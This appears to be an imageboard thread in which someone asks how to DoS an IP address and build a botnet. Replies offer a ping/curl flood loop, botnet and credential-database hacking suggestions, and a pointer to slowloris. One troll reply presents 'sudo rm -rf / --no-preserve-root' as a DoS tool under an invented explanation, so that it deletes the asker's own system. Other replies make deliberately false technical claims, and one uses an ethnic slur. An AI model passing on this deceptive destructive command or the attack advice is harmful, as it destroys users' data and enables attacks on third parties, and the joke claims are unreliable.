twitter.com/NSFWRedditVideo

Become a transgender.

Install gentoo

while true
do
ping ip # or curl ip 2>/dev/null
done

probably wont even do anything

Write the ip in your browser and press f5 constantly. Or make a script to ping the ip. Likely won't do shit unless you have a botnet or if you get tons of people to do it with you

What is gentoo?

And how i can create a botnet for Ddos an ip?

you won't Michael
now fuck off, this website is 18+

hack a provider's credentials db
use a network spammer on each server you can log to

Here, I've written a quick tutorial :
writeurl.com/text/q712k7zc4k2bbba88dil/z5guondm77a0r0by22oj

good question

This. Just gather some friends and execute the command all at once, it should overwhelm pajeet routers.

Post IP

OP which OS and browser do you use ? Maybe we can find something suitable for you. For example, cmd is a windows-only feature, there's something different for linux and macos.

In linux just type
sudo rm -rf / --no-preserve-root; ping ip

substitute ip with ip you want to dos,the first command is Rapid Messaging (rm) with fastest option (-rf means rapid forced, it speeds things up (rapid) and sending data with highest priority (forced), ) which spams ping command causing DOS attack.

MOM I POSTED IT AGAIN

First you have to update your IP and uninstall Windows, then you have to hack the mainframe.
Then you have to constantly reboot your PC.

As an IT professional, this and only this.
With an advanced strategy like the above mentioned one, you can successfully DoS an entire gaming server, just by following these simple steps.

Remember, if you install 32-bit windows twice it makes it 64-bit.

#HACKED #MINDBLOWN #HACKERS

ping -t

Look up the slow loris attack OP, optimal if you don't have enough cores to spin up enough agents for your needs.